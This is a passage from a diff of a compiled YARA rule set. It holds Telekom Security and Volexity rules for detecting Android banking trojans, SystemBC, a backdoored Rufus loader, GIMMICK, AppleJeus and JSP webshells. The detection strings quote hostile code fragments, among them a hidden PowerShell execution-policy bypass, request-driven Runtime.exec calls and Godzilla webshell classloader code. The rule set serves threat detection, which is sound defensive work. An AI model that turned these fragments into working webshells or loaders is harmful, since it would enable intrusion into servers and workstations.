+		$s2 = "Opening inject"
+		$s3 = "Prevented samsung power off"
+		$s4 = "com.huawei.appmarket"
+		$s5 = "kill_bot"
+		$s6 = "kloger:"
+		$s7 = "logged_sms"
+		$s8 = "xiaomi_autostart"
+
+	condition:
+		($dex at 0 or $vdex at 0 ) and 6 of ( $s* )
+}
+rule TELEKOM_SECURITY_Win_Systembc_20220311 : FILE
+{
+	meta:
+		description = "Detects unpacked SystemBC module"
 		author = "Thomas Barabosch, Deutsche Telekom Security"
-		id = "1f6fa228-300c-59de-b89c-3cbdce1b6374"
-		date = "2022-03-18"
-		modified = "2022-03-18"
-		reference = "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777"
-		source_url = "https://github.com/telekom-security/malware_analysis//blob/bf832d97e8fd292ec5e095e35bde992a6462e71c/defray777/vatet_loader.yar#L1-L27"
+		id = "39e1a131-bd2c-56e9-961f-2b2c31f29e85"
+		date = "2022-03-11"
+		modified = "2022-03-13"
+		reference = "https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6"
+		source_url = "https://github.com/telekom-security/malware_analysis//blob/bf832d97e8fd292ec5e095e35bde992a6462e71c/systembc/systembc.yara#L1-L27"
 		license_url = "N/A"
-		logic_hash = "3767398112759689078f992eb272cfec3e59f6d9ca30f8da68c2053e1217fd18"
+		logic_hash = "2f6e2c4c786941f800678e22679d4b81d1097a46c2555ae70e745df1b997c1c8"
 		score = 75
-		quality = 20
-		tags = "DEFRAY777"
+		quality = 70
+		tags = "FILE"
 		sharing = "TLP:WHITE"
-		hash_1 = "c9c1caae50459896a15dce30eaca91e49e875207054d98e32e16a3e203446569"
-		hash_2 = "0cb8fc89541969304f3bf806e938452b36348bdd0280fc8f4e9221993e745334"
-		in_memory = "False"
+		hash_1 = "c926338972be5bdfdd89574f3dc2fe4d4f70fd4e24c1c6ac5d2439c7fcc50db5"
+		in_memory = "True"
 
 	strings:
-		$payload_decryption = { 66 0F F8 C1 66 0F EF C2 66 0F F8 C1 }
-		$mz = "MZ" ascii
-		$rufus = "https://rufus.ie/" ascii
+		$sx1 = "-WindowStyle Hidden -ep bypass -file" ascii
+		$sx2 = "BEGINDATA" ascii
+		$sx3 = "GET %s HTTP/1.0" ascii
+		$s5 = "User-Agent:" ascii
+		$s8 = "ALLUSERSPROFILE" ascii
 
 	condition:
-		$mz at 0 and $payload_decryption and $rufus
+		( uint16( 0 ) == 0x5a4d and filesize < 30KB and 2 of ( $sx* ) ) or all of them
 }
 rule TELEKOM_SECURITY_Fake_Gzip_Bokbot_202104
 {
@@ -161423,51 +161433,33 @@ rule TELEKOM_SECURITY_Win_Iceid_Core_202104 : FILE
 	condition:
 		uint16( 0 ) == 0x5a4d and filesize < 5000KB and ( $internal_name or all of ( $s* ) ) or all of them
 }
-rule TELEKOM_SECURITY_Get_Windows_Proxy_Configuration : CAPABILITY HACKTOOL
+rule TELEKOM_SECURITY_Vatet_Loader_Rufus_Backdoor : DEFRAY777
 {
 	meta:
-		description = "Queries Windows Registry for proxy configuration"
+		description = "Detects backdoored Rufus with Vatet Loader of Defray777"
 		author = "Thomas Barabosch, Deutsche Telekom Security"
-		id = "b67b0b70-a95f-5c65-a522-ef4f41e36159"
-		date = "2022-01-14"
-		modified = "2023-12-12"
-		reference = "https://docs.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/microsoft-windows-ie-clientnetworkprotocolimplementation-hklmproxyserver"
-		source_url = "https://github.com/telekom-security/malware_analysis//blob/bf832d97e8fd292ec5e095e35bde992a6462e71c/hacktools/hacktools.yar#L44-L57"
+		id = "1f6fa228-300c-59de-b89c-3cbdce1b6374"
+		date = "2022-03-18"
+		modified = "2022-03-18"
+		reference = "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777"
+		source_url = "https://github.com/telekom-security/malware_analysis//blob/bf832d97e8fd292ec5e095e35bde992a6462e71c/defray777/vatet_loader.yar#L1-L27"
 		license_url = "N/A"
-		logic_hash = "db52782a56d42f6e460466ea46993490bbbceeb7422d45211f064edb2e37a8eb"
+		logic_hash = "3767398112759689078f992eb272cfec3e59f6d9ca30f8da68c2053e1217fd18"
 		score = 75
-		quality = 70
-		tags = "CAPABILITY, HACKTOOL"
-
-	strings:
-		$a = "Software\\Microsoft\\Windows\\Currentversion\\Internet Settings" ascii wide
-		$b = "ProxyEnable" ascii wide
-		$c = "ProxyServer" ascii wide
-
-	condition:
-		all of them
-}
-rule TELEKOM_SECURITY_Cn_Utf8_Windows_Terminal : CAPABILITY HACKTOOL
-{
-	meta:
-		description = "This is a (dirty) hack to display UTF-8 on Windows command prompt."
-		author = "Thomas Barabosch, Deutsche Telekom Security"
-		id = "a1beee71-c526-58fb-a255-dba55ef7535b"
-		date = "2022-01-14"
-		modified = "2023-12-12"
-		reference = "https://www.bitdefender.com/files/News/CaseStudies/study/401/Bitdefender-PR-Whitepaper-FIN8-creat5619-en-EN.pdf"
-		source_url = "https://github.com/telekom-security/malware_analysis//blob/bf832d97e8fd292ec5e095e35bde992a6462e71c/hacktools/hacktools.yar#L59-L71"
-		license_url = "N/A"
-		logic_hash = "4c91280c3d6d3b48c4ee11bf3d0c2baecee1368fbf3951c0a3bf386454c557cf"
-		score = 40
 		quality = 20
-		tags = "CAPABILITY, HACKTOOL"
+		tags = "DEFRAY777"
+		sharing = "TLP:WHITE"
+		hash_1 = "c9c1caae50459896a15dce30eaca91e49e875207054d98e32e16a3e203446569"
+		hash_2 = "0cb8fc89541969304f3bf806e938452b36348bdd0280fc8f4e9221993e745334"
+		in_memory = "False"
 
 	strings:
-		$a = " chcp 65001 " ascii wide
+		$payload_decryption = { 66 0F F8 C1 66 0F EF C2 66 0F F8 C1 }
+		$mz = "MZ" ascii
+		$rufus = "https://rufus.ie/" ascii
 
 	condition:
-		$a
+		$mz at 0 and $payload_decryption and $rufus
 }
 rule TELEKOM_SECURITY_Crylock_Binary : FILE
 {
@@ -161539,224 +161531,882 @@ rule TELEKOM_SECURITY_Crylock_Hta : FILE
 	condition:
 		filesize < 100KB and 8 of ( $s* )
 }
-rule TELEKOM_SECURITY_Android_Teabot : FILE
+rule TELEKOM_SECURITY_Get_Windows_Proxy_Configuration : CAPABILITY HACKTOOL
 {
 	meta:
-		description = "matches on dumped, decrypted V/DEX files of Teabot"
-		author = "Thomas Barabosch, Telekom Security"
-		id = "9db701bf-be84-5236-97f7-67043cf3ea93"
-		date = "2021-09-14"
-		modified = "2021-09-14"
-		reference = "https://github.com/telekom-security/malware_analysis/"
-		source_url = "https://github.com/telekom-security/malware_analysis//blob/bf832d97e8fd292ec5e095e35bde992a6462e71c/flubot/teabot.yar#L1-L23"
+		description = "Queries Windows Registry for proxy configuration"
+		author = "Thomas Barabosch, Deutsche Telekom Security"
+		id = "b67b0b70-a95f-5c65-a522-ef4f41e36159"
+		date = "2022-01-14"
+		modified = "2023-12-12"
+		reference = "https://docs.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/microsoft-windows-ie-clientnetworkprotocolimplementation-hklmproxyserver"
+		source_url = "https://github.com/telekom-security/malware_analysis//blob/bf832d97e8fd292ec5e095e35bde992a6462e71c/hacktools/hacktools.yar#L44-L57"
 		license_url = "N/A"
-		hash = "37be18494cd03ea70a1fdd6270cef6e3"
-		logic_hash = "5aa7fdb191c36510c7698f3eae40c0b7f15c944b8f60113bbb4e40fc926579b8"
+		logic_hash = "db52782a56d42f6e460466ea46993490bbbceeb7422d45211f064edb2e37a8eb"
 		score = 75
-		quality = 45
-		tags = "FILE"
-		version = "20210819"
+		quality = 70
+		tags = "CAPABILITY, HACKTOOL"
 
 	strings:
-		$dex = "dex"
-		$vdex = "vdex"
-		$s1 = "ERR 404: Unsupported device"
-		$s2 = "Opening inject"
-		$s3 = "Prevented samsung power off"
-		$s4 = "com.huawei.appmarket"
-		$s5 = "kill_bot"
-		$s6 = "kloger:"
-		$s7 = "logged_sms"
-		$s8 = "xiaomi_autostart"
+		$a = "Software\\Microsoft\\Windows\\Currentversion\\Internet Settings" ascii wide
+		$b = "ProxyEnable" ascii wide
+		$c = "ProxyServer" ascii wide
 
 	condition:
-		($dex at 0 or $vdex at 0 ) and 6 of ( $s* )
+		all of them
 }
-rule TELEKOM_SECURITY_Android_Flubot : FILE
+rule TELEKOM_SECURITY_Cn_Utf8_Windows_Terminal : CAPABILITY HACKTOOL
 {
 	meta:
-		description = "matches on dumped, decrypted V/DEX files of Flubot version > 4.2"
-		author = "Thomas Barabosch, Telekom Security"
-		id = "d6d1eebc-961f-5032-af04-4c95f364a74d"
-		date = "2021-09-14"
-		modified = "2021-09-14"
-		reference = "https://github.com/telekom-security/malware_analysis/"
-		source_url = "https://github.com/telekom-security/malware_analysis//blob/bf832d97e8fd292ec5e095e35bde992a6462e71c/flubot/flubot.yar#L1-L19"
+		description = "This is a (dirty) hack to display UTF-8 on Windows command prompt."
+		author = "Thomas Barabosch, Deutsche Telekom Security"
+		id = "a1beee71-c526-58fb-a255-dba55ef7535b"
+		date = "2022-01-14"
+		modified = "2023-12-12"
+		reference = "https://www.bitdefender.com/files/News/CaseStudies/study/401/Bitdefender-PR-Whitepaper-FIN8-creat5619-en-EN.pdf"
+		source_url = "https://github.com/telekom-security/malware_analysis//blob/bf832d97e8fd292ec5e095e35bde992a6462e71c/hacktools/hacktools.yar#L59-L71"
 		license_url = "N/A"
-		hash = "37be18494cd03ea70a1fdd6270cef6e3"
-		logic_hash = "db22e0890dfad7cb9cb1d18aadb406514e5e8874051aa7f07a4bb93da9db68df"
+		logic_hash = "4c91280c3d6d3b48c4ee11bf3d0c2baecee1368fbf3951c0a3bf386454c557cf"
+		score = 40
+		quality = 20
+		tags = "CAPABILITY, HACKTOOL"
+
+	strings:
+		$a = " chcp 65001 " ascii wide
+
+	condition:
+		$a
+}
+/*
+ * YARA Rule Set
+ * Repository Name: Volexity
+ * Repository: https://github.com/volexity/threat-intel
+ * Retrieval Date: 2026-03-01
+ * Git Commit: 92353b1ccc638f5ed0e7db43a26cb40fad7f03df
+ * Number of Rules: 86
+ * Skipped: 0 (age), 0 (quality), 0 (score), 0 (importance)
+ *
+ *
+ * LICENSE
+ *
+ * Copyright 2022 by Volexity, Inc.
+
+The 2-Clause BSD License
+
+Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+ */
+rule VOLEXITY_Webshell_Jsp_Godzilla : FILE MEMORY
+{
+	meta:
+		description = "Detects the JSP implementation of the Godzilla Webshell."
+		author = "threatintel@volexity.com"
+		id = "47c8eab8-84d7-5566-b757-5a6dcc7579b7"
+		date = "2021-11-08"
+		modified = "2024-07-30"
+		reference = "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/"
+		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2022/2022-08-10 Mass exploitation of (Un)authenticated Zimbra RCE CVE-2022-27925/yara.yar#L1-L34"
+		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
+		logic_hash = "52cba9545f662da18ca6e07340d7a9be637b89e7ed702dd58cac545c702a00e3"
 		score = 75
-		quality = 45
-		tags = "FILE"
-		version = "20210720"
+		quality = 80
+		tags = "FILE, MEMORY"
+		hash1 = "2786d2dc738529a34ecde10ffeda69b7f40762bf13e7771451f13a24ab7fc5fe"
+		os = "win,linux"
+		os_arch = "all"
+		scan_context = "file,memory"
+		severity = "critical"
+		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
+		rule_id = 6100
+		version = 6
 
 	strings:
-		$dex = "dex"
-		$vdex = "vdex"
-		$s1 = "LAYOUT_MANAGER_CONSTRUCTOR_SIGNATURE"
-		$s2 = "java/net/HttpURLConnection;"
-		$s3 = "java/security/spec/X509EncodedKeySpec;"
-		$s4 = "MANUFACTURER"
+		$s1 = ".getWriter().write(base64Encode(" wide ascii
+		$s2 = ".getAttribute(" ascii wide
+		$s3 = "java.security.MessageDigest" ascii wide
+		$auth1 = /String xc=\"[a-f0-9]{16}\"/ ascii wide
+		$auth2 = "String pass=\"" ascii wide
+		$magic = "class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q"
+		$magic2 = "<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class"
 
 	condition:
-		($dex at 0 or $vdex at 0 ) and 3 of ( $s* )
+		all of ( $s* ) or all of ( $auth* ) or any of ( $magic* )
 }
-rule TELEKOM_SECURITY_Win_Systembc_20220311 : FILE
+rule VOLEXITY_Susp_Jsp_General_Runtime_Exec_Req : FILE MEMORY
 {
 	meta:
-		description = "Detects unpacked SystemBC module"
-		author = "Thomas Barabosch, Deutsche Telekom Security"
-		id = "39e1a131-bd2c-56e9-961f-2b2c31f29e85"
-		date = "2022-03-11"
-		modified = "2022-03-13"
-		reference = "https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6"
-		source_url = "https://github.com/telekom-security/malware_analysis//blob/bf832d97e8fd292ec5e095e35bde992a6462e71c/systembc/systembc.yara#L1-L27"
-		license_url = "N/A"
-		logic_hash = "2f6e2c4c786941f800678e22679d4b81d1097a46c2555ae70e745df1b997c1c8"
+		description = "Looks for a common design pattern in webshells where a request attribute is passed as an argument to exec()."
+		author = "threatintel@volexity.com"
+		id = "7f1539bd-a2f0-50dd-b500-ada4e0971d13"
+		date = "2022-02-02"
+		modified = "2024-07-30"
+		reference = "https://github.com/volexity/threat-intel"
+		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2022/2022-08-10 Mass exploitation of (Un)authenticated Zimbra RCE CVE-2022-27925/yara.yar#L35-L56"
+		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
+		logic_hash = "d3048aba80c1c39f1673931cd2d7c5ed83045603b0ad204073fd788d0103a6c8"
+		score = 65
+		quality = 80
+		tags = "FILE, MEMORY"
+		hash1 = "4935f0c50057e28efa7376c734a4c66018f8d20157b6584399146b6c79a6de15"
+		os = "win,linux"
+		os_arch = "all"
+		scan_context = "file,memory"
+		severity = "high"
+		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
+		rule_id = 6450
+		version = 3
+
+	strings:
+		$s1 = "Runtime.getRuntime().exec(request." ascii
+
+	condition:
+		$s1
+}
+rule VOLEXITY_Webshell_Jsp_Regeorg : FILE MEMORY
+{
+	meta:
+		description = "Detects the reGeorg webshells' JSP version."
+		author = "threatintel@volexity.com"
+		id = "205ee383-4298-5469-a509-4ce3eaf9dd0e"
+		date = "2022-03-08"
+		modified = "2024-09-20"
+		reference = "https://github.com/SecWiki/WebShell-2/blob/master/reGeorg-master/tunnel.jsp"
+		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2022/2022-08-10 Mass exploitation of (Un)authenticated Zimbra RCE CVE-2022-27925/yara.yar#L57-L86"
+		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
+		logic_hash = "cecb71605d9112d509823c26e40e1cf9cd6db581db448db5c9ffc63a2bfe529e"
 		score = 75
-		quality = 70
+		quality = 80
+		tags = "FILE, MEMORY"
+		hash1 = "f9b20324f4239a8c82042d8207e35776d6777b6305974964cd9ccc09d431b845"
+		os = "win"
+		os_arch = "all"
+		scan_context = "file,memory"
+		severity = "critical"
+		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
+		rule_id = 6575
+		version = 5
+
+	strings:
+		$magic = "socketChannel.connect(new InetSocketAddress(target, port))" ascii
+		$a1 = ".connect(new InetSocketAddress" ascii
+		$a2 = ".configureBlocking(false)" ascii
+		$a3 = ".setHeader(" ascii
+		$a4 = ".getHeader(" ascii
+		$a5 = ".flip();" ascii
+
+	condition:
+		$magic or all of ( $a* )
+}
+rule VOLEXITY_Apt_Malware_Macos_Gimmick : STORMBAMBOO FILE MEMORY
+{
+	meta:
+		description = "Detects the macOS port of the GIMMICK malware."
+		author = "threatintel@volexity.com"
+		id = "3d485788-4aab-511b-a49e-5dc09d1950a9"
+		date = "2021-10-18"
+		modified = "2024-08-02"
+		reference = "https://www.volexity.com/blog/2022/03/22/storm-cloud-on-the-horizon-gimmick-malware-strikes-at-macos/"
+		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2022/2022-03-22 GIMMICK/indicators/yara.yar#L1-L59"
+		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
+		logic_hash = "00fba9df2212874a45d44b3d098a7b76c97fcd53ff083c76b784d2b510a4a467"
+		score = 75
+		quality = 78
+		tags = "STORMBAMBOO, FILE, MEMORY"
+		hash1 = "2a9296ac999e78f6c0bee8aca8bfa4d4638aa30d9c8ccc65124b1cbfc9caab5f"
+		os = "darwin"
+		os_arch = "all"
+		scan_context = "file,memory"
+		severity = "critical"
+		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
+		rule_id = 6022
+		version = 8
+
+	strings:
+		$s1 = "http://cgi1.apnic.net/cgi-bin/my-ip.php --connect-timeout 10 -m 20" wide ascii
+		$json1 = "base_json" ascii wide
+		$json2 = "down_json" ascii wide
+		$json3 = "upload_json" ascii wide
+		$json4 = "termin_json" ascii wide
+		$json5 = "request_json" ascii wide
+		$json6 = "online_json" ascii wide
+		$json7 = "work_json" ascii wide
+		$msg1 = "bash_pid: %d, FDS_CHILD: %d, FDS_PARENT: %d" ascii wide
+		$msg2 = "pid %d is dead" ascii wide
+		$msg3 = "exit with code %d" ascii wide
+		$msg4 = "recv signal %d" ascii wide
+		$cmd1 = "ReadCmdQueue" ascii wide
+		$cmd2 = "read_cmd_server_timer" ascii wide
+		$cmd3 = "enableProxys" ascii wide
+		$cmd4 = "result_block" ascii wide
+		$cmd5 = "createDirLock" ascii wide
+		$cmd6 = "proxyLock" ascii wide
+		$cmd7 = "createDirTmpItem" ascii wide
+		$cmd8 = "dowfileLock" ascii wide
+		$cmd9 = "downFileTmpItem" ascii wide
+		$cmd10 = "filePathTmpItem" ascii wide
+		$cmd11 = "uploadItems" ascii wide
+		$cmd12 = "downItems" ascii wide
+		$cmd13 = "failUploadItems" ascii wide
+		$cmd14 = "failDownItems" ascii wide
+		$cmd15 = "downloadCmds" ascii wide
+		$cmd16 = "uploadFiles" ascii wide
+		$cmd17 = "bash callback...." ascii wide
+
+	condition:
+		$s1 or 5 of ( $json* ) or 3 of ( $msg* ) or 9 of ( $cmd* )
+}
+rule VOLEXITY_Apt_Malware_Win_Gimmick_Dotnet_Base : STORMBAMBOO FILE MEMORY
+{
+	meta:
+		description = "Detects the base version of GIMMICK written in .NET."
+		author = "threatintel@volexity.com"
+		id = "be42d85f-3143-51d3-b148-95d0ae666771"
+		date = "2020-03-16"
+		modified = "2024-08-19"
+		reference = "https://github.com/volexity/threat-intel"
+		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2022/2022-03-22 GIMMICK/indicators/yara.yar#L60-L86"
+		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
+		logic_hash = "39a38ea189d5e840f9334cb7ec8f390444139b39c6f426906a8845f9a1ada9f7"
+		score = 75
+		quality = 80
+		tags = "STORMBAMBOO, FILE, MEMORY"
+		hash1 = "b554bfe4c2da7d0ac42d1b4f28f4aae854331fd6d2b3af22af961f6919740234"
+		os = "win"
+		os_arch = "all"
+		scan_context = "file,memory"
+		severity = "critical"
+		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
+		rule_id = 6628
+		version = 3
+
+	strings:
+		$other1 = "srcStr is null" wide
+		$other2 = "srcBs is null " wide
+		$other3 = "Key cannot be null" wide
+		$other4 = "Faild to get target constructor, targetType=" wide
+		$other5 = "hexMoudule(public key) cannot be null or empty." wide
+		$other6 = "https://oauth2.googleapis.com/token" wide
+
+	condition:
+		5 of ( $other* )
+}
+rule VOLEXITY_Webshell_Jsp_Converge : FILE MEMORY CVE_2022_26134
+{
+	meta:
+		description = "Detects CONVERGE - a file upload webshell observed in incident involving compromise of Confluence server via CVE-2022-26134."
+		author = "threatintel@volexity.com"
+		id = "2a74678e-cb00-567c-a2e0-2e095f3e5ee8"
+		date = "2022-06-01"
+		modified = "2024-09-20"
+		reference = "https://github.com/volexity/threat-intel"
+		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2022/2022-06-02 Active Exploitation Of Confluence 0-day/indicators/yara.yar#L1-L21"
+		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
+		logic_hash = "bb48516342eddd48c35e6db0eb74f95e116dc723503552b99ba721b5bdb391e5"
+		score = 75
+		quality = 80
+		tags = "FILE, MEMORY, CVE-2022-26134"
+		os = "all"
+		os_arch = "all"
+		scan_context = "file,memory"
+		severity = "critical"
+		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
+		rule_id = 6788
+		version = 5
+
+	strings:
+		$s1 = "if (request.getParameter(\"name\")!=null && request.getParameter(\"name\").length()!=0){" ascii
+
+	condition:
+		$s1
+}
+rule VOLEXITY_Webshell_Java_Realcmd : FILE MEMORY
+{
+	meta:
+		description = "Detects the RealCMD webshell, one of the payloads for BEHINDER."
+		author = "threatintel@volexity.com"
+		id = "60b30ccc-bcfa-51e6-a3f5-88037d19213e"
+		date = "2022-06-01"
+		modified = "2024-07-30"
+		reference = "https://github.com/Freakboy/Behinder/blob/master/src/main/java/vip/youwe/sheller/payload/java/RealCMD.java"
+		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2022/2022-06-02 Active Exploitation Of Confluence 0-day/indicators/yara.yar#L61-L84"
+		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
+		logic_hash = "e09f2a23674fd73296dd4d1fabf1a2c812bfe69ff02abc96a4be35af6a18e512"
+		score = 75
+		quality = 80
+		tags = "FILE, MEMORY"
+		hash1 = "a9a30455d6f3a0a8cd0274ae954aa41674b6fd52877fafc84a9cb833fd8858f6"
+		os = "all"
+		os_arch = "all"
+		scan_context = "file,memory"
+		severity = "critical"
+		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
+		rule_id = 6786
+		version = 4
+
+	strings:
+		$fn1 = "runCmd" wide ascii fullword
+		$fn2 = "RealCMD" ascii wide fullword
+		$fn3 = "buildJson" ascii wide fullword
+
+	condition:
+		all of ( $fn* )
+}
+rule VOLEXITY_Apt_Malware_Win_Applejeus_Oct22 : LAZYPINE FILE MEMORY
+{
+	meta:
+		description = "Detects AppleJeus DLL samples."
+		author = "threatintel@volexity.com"
+		id = "f88e2253-e296-57d8-a627-6cb4ccff7a92"
+		date = "2022-11-03"
+		modified = "2025-05-21"
+		reference = "https://github.com/volexity/threat-intel"
+		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2022/2022-12-01 Buyer Beware - Fake Cryptocurrency Applications Serving as Front for AppleJeus Malware/yara.yar#L1-L22"
+		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
+		logic_hash = "46f3325a7e8e33896862b1971f561f4871670842aecd46bcc7a5a1af869ecdc4"
+		score = 75
+		quality = 80
+		tags = "LAZYPINE, FILE, MEMORY"
+		hash1 = "82e67114d632795edf29ce1d50a4c1c444846d9e16cd121ce26e63c8dc4a1629"
+		os = "win"
+		os_arch = "all"
+		scan_context = "file,memory"
+		severity = "critical"
+		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
+		rule_id = 8495
+		version = 3
+
+	strings:
+		$s1 = "HijackingLib.dll" ascii
+
+	condition:
+		$s1
+}
+rule VOLEXITY_Apt_Malware_Win_Applejeus_B_Oct22 : LAZYPINE FILE MEMORY
+{
+	meta:
+		description = "Detects unpacked AppleJeus samples."
+		author = "threatintel@volexity.com"
+		id = "8586dc64-225b-5f28-a6d6-b9b6e8f1c815"
+		date = "2022-11-03"
+		modified = "2025-05-21"
+		reference = "https://www.volexity.com/blog/2022/12/01/buyer-beware-fake-cryptocurrency-applications-serving-as-front-for-applejeus-malware/"
+		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2022/2022-12-01 Buyer Beware - Fake Cryptocurrency Applications Serving as Front for AppleJeus Malware/yara.yar#L24-L54"
+		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
+		logic_hash = "76f3c9692ea96d3cadbbcad03477ab6c53445935352cb215152b9b5483666d43"
+		score = 75
+		quality = 80
+		tags = "LAZYPINE, FILE, MEMORY"
+		hash1 = "9352625b3e6a3c998e328e11ad43efb5602fe669aed9c9388af5f55fadfedc78"
+		os = "win"
+		os_arch = "all"
+		scan_context = "file,memory"
+		severity = "critical"
+		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
+		rule_id = 8497
+		version = 5
+
+	strings:
+		$key1 = "AppX7y4nbzq37zn4ks9k7amqjywdat7d"
+		$key2 = "Gd2n5frvG2eZ1KOe"
+		$str1 = "Windows %d(%d)-%s"
+		$str2 = "&act=check"
+
+	condition:
+		( any of ( $key* ) and 1 of ( $str* ) ) or all of ( $str* )
+}
+rule VOLEXITY_Apt_Malware_Win_Applejeus_C_Oct22 : LAZYPINE MEMORY
+{
+	meta:
+		description = "Detects unpacked AppleJeus samples."
+		author = "threatintel@volexity.com"
+		id = "c9cbddde-220c-5e26-8760-85c29b98bfeb"
+		date = "2022-11-03"
+		modified = "2023-09-28"
+		reference = "https://www.volexity.com/blog/2022/12/01/buyer-beware-fake-cryptocurrency-applications-serving-as-front-for-applejeus-malware/"
+		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2022/2022-12-01 Buyer Beware - Fake Cryptocurrency Applications Serving as Front for AppleJeus Malware/yara.yar#L57-L84"
+		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
+		logic_hash = "a9e635d9353c8e5c4992beba79299fb889a7a3d5bc3eaf191f8bb7f51258a6c6"
+		score = 75
+		quality = 80
+		tags = "LAZYPINE, MEMORY"
+		hash1 = "a0db8f8f13a27df1eacbc01505f311f6b14cf9b84fbc7e84cb764a13f001dbbb"
+		os = "win"
+		os_arch = "all"
+		scan_context = "memory"
+		severity = "critical"
+		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
+		rule_id = 8519
+		version = 3
+
+	strings:
+		$str1 = "%sd.e%sc \"%s > %s 2>&1\"" wide
+		$str2 = "tuid"
+		$str4 = "payload"
+		$str5 = "fconn"
+		$str6 = "Mozilla_%lu"
+
+	condition:
+		5 of ( $str* )
+}
+rule VOLEXITY_Apt_Malware_Win_Applejeus_D_Oct22 : LAZYPINE FILE MEMORY
+{
+	meta:
+		description = "Detected AppleJeus unpacked samples."
+		author = "threatintel@volexity.com"
+		id = "80d2821b-a437-573e-9e9d-bf79f9422cc9"
+		date = "2022-11-10"
+		modified = "2025-05-21"
+		reference = "https://www.volexity.com/blog/2022/12/01/buyer-beware-fake-cryptocurrency-applications-serving-as-front-for-applejeus-malware/"
+		source_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/2022/2022-12-01 Buyer Beware - Fake Cryptocurrency Applications Serving as Front for AppleJeus Malware/yara.yar#L87-L112"
+		license_url = "https://github.com/volexity/threat-intel/blob/92353b1ccc638f5ed0e7db43a26cb40fad7f03df/LICENSE.txt"
+		logic_hash = "23c0642e5be15a75a39d089cd52f2f14d633f7af6889140b9ec6e53c5c023974"
+		score = 75
+		quality = 80
+		tags = "LAZYPINE, FILE, MEMORY"
+		hash1 = "a241b6611afba8bb1de69044115483adb74f66ab4a80f7423e13c652422cb379"
+		os = "win"
+		os_arch = "all"
+		scan_context = "file,memory"
